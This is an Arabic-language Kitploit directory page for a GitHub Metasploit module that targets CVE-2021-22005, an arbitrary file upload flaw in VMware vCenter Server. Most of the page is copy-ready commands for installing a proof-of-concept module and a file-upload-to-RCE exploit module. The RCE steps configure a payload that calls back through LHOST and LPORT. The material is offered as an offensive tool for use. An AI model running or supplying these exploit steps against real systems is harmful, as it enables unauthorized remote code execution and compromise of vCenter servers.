Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-22005 — وحدة Metasploit لثغرة CVE-2021-22005 في VMware vCenter المتمثلة في رفع ملفات عشوائي مع إثبات المفهوم واستغلال تنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/tiagob0b/cve-2021-22005
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubtiagob0b/cve-2021-22005

CVE-2021-22005

وحدة Metasploit لثغرة CVE-2021-22005 في VMware vCenter المتمثلة في رفع ملفات عشوائي مع إثبات المفهوم واستغلال تنفيذ التعليمات البرمجية عن بُعد.

عرض المستودع
232منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-22005-metasploit

هذا سكريبت ميتاسبلويت (POC/EXP) خاص بثغرة CVE-2021-22005 حيث يحتوي VMware vCenter Server على ثغرة رفع ملفات عشوائية

التحضير لـ POC

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole

استخدام POC

root@kitploit:~
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: true for https>
exploit

النتيجة

سيقوم السكريبت برفع ملف jsp غير ضار يحتوي على نص "Could be vuln by CVE-2021-22005" مشفّر بـ base64 poc

التحضير لـ EXP

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/exploits/linux/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/
chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py
msfconsole

استخدام الاستغلال

root@kitploit:~
set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
exploit

الاستغلال

exploit

المراجع

  • https://github.com/5gstudent/CVE-2021-22005-
  • https://github.com/rwincey/CVE-2021-22005
تنزيل الأداة